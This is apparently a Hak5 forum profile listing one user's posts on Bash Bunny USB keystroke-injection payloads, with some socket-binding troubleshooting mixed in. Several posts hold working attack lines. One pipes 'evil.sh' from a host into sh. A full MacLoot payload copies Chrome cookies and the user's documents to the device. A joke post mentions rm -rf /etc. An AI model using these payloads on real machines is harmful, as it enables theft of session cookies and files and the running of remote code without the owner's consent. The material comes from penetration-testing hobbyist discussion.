Jump to content
Hak5 Forums


Active Members
  • Content count

  • Joined

  • Last visited

  • Days Won


About audibleblink

  • Rank
    the mole

Profile Information

  • Gender
  • Location
  • Interests
    Software engineer. I've been know to write Rails for money.

Recent Profile Visitors

671 profile views
  1. Slow at binding sockets

    For future readers: I was using python's SimpleHTTPServer to try to serve the local directory. Even when binding the USB's network interface with $HOST_IP, it would still make that request and wait 15 seconds before continuing on. The answer for me was to disallow outgoing requests. This is the code that made the webserver start instantly. iptables -A OUTPUT -p udp --dport 53 -j DROP python -m SimpleHTTPServer 80
  2. Slow at binding sockets

    Hmm, nope. Fresh restore and it still happens. wth? Tried it on another computer too
  3. Slow at binding sockets

    Right on, thanks Seb. Guess it's just me, I'll close my issue and run a restore.
  4. Slow at binding sockets

    Oh thanks man! I guess it's me then. I'm using linux. I can't think of a reason why I wouldn't see the delay in serial. Are you using ECM too? I think I'll try RNDIS just to see if anything changes. edit: nope. same delay with rndis_ethernet
  5. Slow at binding sockets

    It's a very quick thing to do. it takes under a second when I run it in serial mode
  6. Slow at binding sockets

    If I code something like this LED R python -m SimpleHTTPServer QUACK GUI space Q ENTER Q STRING terminal Q ENTER Q STRING curl $HOST_IP/evil.sh \| sh (with appropriate delays) it fails because the server takes 15 seconds to start anyway. I don't think it has anything to do with ssh. I was just logged in through ssh to develop the payload
  7. Slow at binding sockets

    Has anyone else tried to bind a socket on their BB using something like netcat or python -m SimpleHTTPServer. When connected to the BB through ssh (ecm_ethernet), commands that bind sockets take ~15 seconds to exectue When connected through serial, everything acts as normal. I made a github issue about it, but wasn't sure if that's the right place since that repo is for payloads - https://github.com/hak5/bashbunny-payloads/issues/57
  8. Mac&Linux ~/ = root

    I'm wondering if the /tools/ducky.py (which is called by QUACK) is running in a subshell. If the QUACK commands run async, then the script is running in its entirety before ever finishing the HID section of the payload. Just a hypothesis, this is where my bash knowledge reaches its limits.
  9. Mac&Linux ~/ = root

    Is there a `files` folder in MacLoot? I thought it was just the xlsx folder and the cookies db
  10. Mac&Linux ~/ = root

    it's still in the github code, i only pasted changes here.
  11. Mac&Linux ~/ = root

    Submitted a PR to fix in mainline. - https://github.com/hak5/bashbunny-payloads/issues/51 Basic changes: - fixes lootdir path - dont capitalize var names that aren't exported - indentation - escape shell characters that are passed to QUACK - account for variable copy times by joining cp and exit commands - sync the disk LED G R ATTACKMODE HID STORAGE lootdir=loot/MacLoot mkdir -p /root/udisk/$LOOTDIR QUACK GUI SPACE QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER QUACK DELAY 5000 QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/xlsx QUACK ENTER QUACK DELAY 500 QUACK STRING cat \~/Library/Application\\ Support/Google/Chrome/Default/Cookies \> /Volumes/BashBunny/$lootdir/chromecookies.db QUACK ENTER QUACK DELAY 1000 QUACK STRING cp \~/Documents/{*.xlsx,*.xls,*.pdf} /Volumes/BashBunny/$lootdir/xlsx/\; killall Terminal QUACK ENTER # Sync filesystem sync # Green LED for finished LED G
  12. Mac&Linux ~/ = root

    You can also just `\` escape symbols right in the QUACK directive. QUACK cd $HOME evaluates to cd /root whereas QUACK cd \$HOME literally types cd $HOME This also goes for ~ ; and | symbols. Check out what I mean in this practical example - https://github.com/hak5/bashbunny-payloads/pull/36
  13. OSX exfil script

    It appears we had the same idea. https://github.com/hak5/bashbunny-payloads/pull/36
  14. How to force Bash Bunny into Recovery Mode?

    I'm currently running `rm -rf /etc` then un/plugging 3 times. =X
  15. Install Tools

    Is this still an issue after a recent code merge? Seems to be working OK for me now. There was an issue with CLRF line terminators that was addressed last night.